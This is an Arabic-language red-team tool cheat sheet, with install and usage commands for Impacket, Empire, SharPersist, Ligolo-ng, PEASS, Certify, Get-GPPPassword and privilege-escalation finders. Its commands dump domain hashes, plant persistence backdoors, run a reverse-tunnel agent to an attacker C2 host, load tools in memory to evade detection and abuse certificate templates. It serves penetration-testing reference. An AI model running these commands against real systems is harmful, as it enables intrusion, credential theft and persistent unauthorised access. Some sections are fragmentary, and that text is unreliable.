توفر Impacket مجموعة من الروابط Python منخفضة المستوى لمختلف بروتوكولات الشبكة، بما في ذلك SMB وKerberos وLDAP، بالإضافة إلى مكتبات عالية المستوى للتفاعل مع خدمات الشبكة وأداء مهام محددة مثل تفريغ تجزئات كلمات المرور وإنشاء مشاركات الشبكة.
كما تتضمن عددًا من أدوات سطر الأوامر التي يمكن استخدامها لأداء مهام متنوعة مثل تفريغ قواعد بيانات SAM، وتعداد الثقة في المجال، وكسر كلمات مرور Windows.
التثبيت:```bash python3 -m pip install impacket
**التثبيت: (مع نصوص أمثلة)**
قم بتنزيل واستخراج [الحزمة](https://github.com/fortra/impacket)، ثم انتقل إلى مجلد التثبيت وشغّل...```bash
python3 -m pip install .
الاستخدام:```bash
secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
netview.py domain/user:password -target 192.168.10.2
mssqlinstance.py 192.168.1.2
GetADUsers.py domain/user:password@IP
Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) لاستخدام Impacket.

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)
Empire هو إطار عمل للاستغلال بعد الاختراق يسمح لك بتوليد حمولات لإنشاء اتصالات عن بُعد مع أنظمة الضحايا.
بمجرد تنفيذ حمولة على نظام الضحية، فإنها تنشئ اتصالاً يعود إلى خادم Empire، والذي يمكن استخدامه بعد ذلك لإصدار أوامر والتحكم في النظام المستهدف.
يتضمن Empire أيضًا عددًا من الوحدات والبرامج النصية المضمنة التي يمكن استخدامها لأداء مهام محددة، مثل تفريغ تجزئات كلمات المرور، والوصول إلى سجل Windows، وتسريب البيانات.
**تثبيت:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh
الاستخدام:```bash
./empire
list agents
list listeners
ورقة غش لطيفة للاستخدام [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) من [HarmJoy](https://github.com/HarmJ0y).

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)
مجموعة أدوات استمرار على Windows مكتوبة بلغة C#.
المشروع يحتوي على [wiki](https://github.com/mandiant/SharPersist/wiki).
**التثبيت: (ثنائي)**
يمكنك العثور على أحدث إصدار [هنا](https://github.com/mandiant/SharPersist/releases).
**التثبيت: (تجميع)**
- قم بتنزيل ملفات المشروع من [مستودع GitHub](https://github.com/mandiant/SharPersist).
- قم بتحميل مشروع Visual Studio واذهب إلى "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- اذهب إلى "NuGet Package Manager" --> "Package Sources"
- أضف مصدر حزمة باستخدام الرابط "https://api.nuget.org/v3/index.json"
- قم بتثبيت حزمة NuGet الخاصة بـ Costura.Fody. الإصدار الأقدم من Costura.Fody (3.3.3) مطلوب، حتى لا تحتاج إلى Visual Studio 2019.
- `Install-Package Costura.Fody -Version 3.3.3`
- قم بتثبيت حزمة TaskScheduler
- `Install-Package TaskScheduler -Version 2.8.11`
- يمكنك الآن بناء المشروع بنفسك!
**الاستخدام:**
يمكن العثور على قائمة كاملة من أمثلة الاستخدام [هنا](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add
#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

Ligolo-ng هي أداة بسيطة وخفيفة وسريعة تسمح لمختبري الاختراق بإنشاء أنفاق من اتصال TCP/TLS عكسي باستخدام واجهة tun (بدون الحاجة إلى SOCKS).
بدلاً من استخدام وكيل SOCKS أو موجهات TCP/UDP، تقوم Ligolo-ng بإنشاء مكدس شبكة في وضع المستخدم باستخدام Gvisor.
عند تشغيل خادم المرحل/الوكيل، يتم استخدام واجهة tun، ويتم ترجمة الحزم المرسلة إلى هذه الواجهة، ثم نقلها إلى شبكة العامل البعيدة.
التثبيت: (تنزيل)
الملفات الثنائية المجمعة مسبقًا (Windows/Linux/macOS) متاحة على صفحة الإصدارات.
التثبيت: (بناء)
بناء ligolo-ng (يتطلب Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go
GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go
**الإعداد: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
الإعداد: (ويندوز)
تحتاج إلى تنزيل برنامج تشغيل Wintun (المستخدم من قبل WireGuard) ووضع ملف wintun.dll في نفس المجلد الذي يحتوي على Ligolo (تأكد من استخدام البنية الصحيحة).
الإعداد: (خادم الوكيل)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates
**الاستخدام:**
*قم بتشغيل الوكيل على جهاز الكمبيوتر المستهدف (الضحية) (لا يلزم وجود صلاحيات!):*```bash
./agent -connect attacker_c2_server.com:11601
يجب أن تظهر جلسة على proxy server.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"
استخدم الأمر session لتحديد الوكيل.```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000
يمكن العثور على معلومات الاستخدام الكاملة هنا.

الصورة مستخدمة من https://github.com/nicocha30/ligolo-ng#demo
"أنشأت Accenture أداة تسمى Spartacus، والتي تكتشف فرص اختطاف DLL على Windows. باستخدام Spartacus كنقطة انطلاق، أنشأنا Crassus لتوسيع قدرات اكتشاف تصعيد الامتيازات في Windows إلى ما هو أبعد من مجرد البحث عن الملفات المفقودة. يمكن أن تجد قوائم التحكم في الوصول (ACLs) المستخدمة من قبل ملفات وأدلة العمليات ذات الامتيازات أكثر من مجرد البحث عن الملفات المفقودة لتحقيق الهدف." - الرابط
التثبيت: (بناء)
تم تطوير Crassus كمشروع Visual Studio 2019. لبناء Crassus.exe:
التثبيت: (مجمّع مسبقاً)
إذا كنت تثق في تشغيل كود الآخرين دون معرفة ما يفعله، فإن Crassus.exe متوفر في هذا المستودع.
الاستخدام:
Enable Boot Logging.Ctrl-R.boot.PML. سبب إعادة حفظ ملف السجل هو أمران:

الصورة مستخدمة من https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots
LinPEAS هي أداة تصعيد امتيازات مفصلة جيدة للعثور على مسارات تصعيد الامتيازات المحلية على نقاط النهاية لينكس.
التثبيت + الاستخدام:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)
WinPEAS هي أداة تصعيد امتيازات مفصلة جيدة لإيجاد مسارات تصعيد الامتيازات المحلية على نقاط النهاية في Windows.
**التثبيت + الاستخدام:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

Linux smart enumeration هي أداة أخرى جيدة وأقل إسهابًا لرفع الامتيازات على لينكس.
التثبيت والاستخدام:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)
Certify هي أداة بلغة C# لتعداد واستغلال التكوينات الخاطئة في Active Directory Certificate Services (AD CS).
تم تصميم Certify لاستخدامها بالتزامن مع أدوات وتقنيات الفريق الأحمر الأخرى، مثل Mimikatz وPowerShell، لتمكين أعضاء الفريق الأحمر من تنفيذ أنواع مختلفة من الهجمات، بما في ذلك هجمات الوسيط (man-in-the-middle)، وهجمات انتحال الشخصية، وهجمات تصعيد الصلاحيات.
**الميزات الرئيسية لـ Certify:**
- إنشاء الشهادات
- توقيع الشهادات
- استيراد الشهادات
- تعديل الثقة في الشهادات
**التثبيت: (تجميع)**
Certify متوافق مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح مشروع Certify [.sln](https://github.com/GhostPack/Certify)، اختر "Release"، وقم بالبناء.
**التثبيت: (تشغيل Certify عبر PowerShell)**
إذا كنت ترغب في تشغيل Certify في الذاكرة من خلال غلاف PowerShell، قم أولاً بتجميع Certify ثم قم بتشفير التجميع الناتج باستخدام base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt
يمكن بعد ذلك تحميل Certify في سكريبت PowerShell باستخدام ما يلي (حيث يتم استبدال "aa..." بسلسلة التجميع المشفرة base64 الخاصة بـ Certify):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))
يمكن بعد ذلك استدعاء طريقة Main() وأي وسائط على النحو التالي:```
[Certify.Program]::Main("find /vulnerable".Split())
يمكن العثور على تعليمات التجميع الكاملة هنا.
الاستخدام:```bash
Certify.exe find /vulnerable
Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin
Full example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
Get-GPPPassword هو نص PowerShell جزء من مجموعة أدوات PowerSploit، وهو مصمم لاسترجاع كلمات المرور للحسابات المحلية التي يتم إنشاؤها وإدارتها باستخدام Group Policy Preferences (GPP).
يعمل Get-GPPPassword عن طريق البحث في مجلد SYSVOL على وحدة تحكم المجال عن أي ملفات GPP تحتوي على معلومات كلمة المرور. بمجرد العثور على هذه الملفات، يقوم بفك تشفير معلومات كلمة المرور وعرضها للمستخدم.
**تثبيت:**
اتبع تعليمات تثبيت PowerSploit [هنا](https://github.com/A-poc/RedTeam-Tools#powersploit) من ورقة الأدوات هذه.```bash
powershell.exe -ep bypass
Import-Module PowerSploit
الاستخدام:```bash
Get-GPPPassword
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)
سكريبت PowerShell للعثور السريع على التصحيحات البرمجية المفقودة لثغرات رفع الامتيازات المحلية.
*يدعم:*
- MS10-015 : وضع المستخدم إلى الحلقة (KiTrap0D)
- MS10-092 : جدولة المهام
- MS13-053 : تجاوز سعة كومة نواة Win32k في NTUserMessageCall
- MS13-081 : صفحة NULL Win32k في TrackPopupMenuEx
- MS14-058 : إلغاء مرجع مؤشر فارغ في Win32k TrackPopupMenu
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : تجاوز سعة مخزن مؤقت لبرنامج تشغيل الخطوط
- MS16-016 : WebDAV في 'mrxdav.sys'
- MS16-032 : مقبض تسجيل الدخول الثانوي
- MS16-034 : رفع الامتيازات في برامج تشغيل وضع نواة Windows
- MS16-135 : رفع امتياز Win32k
- CVE-2017-7199 : رفع الامتيازات في Nessus Agent الإصدار 6.6.2 - 6.10.3
**التثبيت: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock
# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1
الاستخدام: (PowerShell)```bash
Find-AllVulns
Find-MS14058

*الصورة مأخوذة من https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/*
### [🔙](#tool-list)[واتسون](https://github.com/rasta-mouse/Watson)
واتسون هي أداة .NET مصممة لتعداد تصحيحات KB المفقودة واقتراح استغلالات لثغرات تصعيد الامتيازات.
ممتازة لتحديد التصحيحات المفقودة واقتراح الاستغلالات التي يمكن استخدامها لاستغلال الثغرات المعروفة من أجل الحصول على صلاحيات أعلى على النظام.
**التثبيت:**
باستخدام [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح [مشروع واتسون .sln](https://github.com/rasta-mouse/Watson)، اختر "Release"، وقم بالبناء.
**الاستخدام:**```bash
# Run all checks
Watson.exe

نص الصورة مأخوذ من https://github.com/rasta-mouse/Watson#usage
أداة مبنية بلغة C# تعمل على أتمتة عملية اكتشاف واستغلال اختطاف DLL في الثنائيات المستهدفة.
يمكن تسليح المسارات المخترقة التي تم اكتشافها أثناء الاختراق لتجاوز أنظمة كشف التهديدات (EDR).
التثبيت:
ملاحظة: يجب وضع المتطلبات i و ii في نفس دليل ملف ImpulsiveDLLHijacks.exe.
معلومات البناء والإعداد:
ImpulsiveDLLHijack
أما بالنسبة لـ DLL التأكيدية: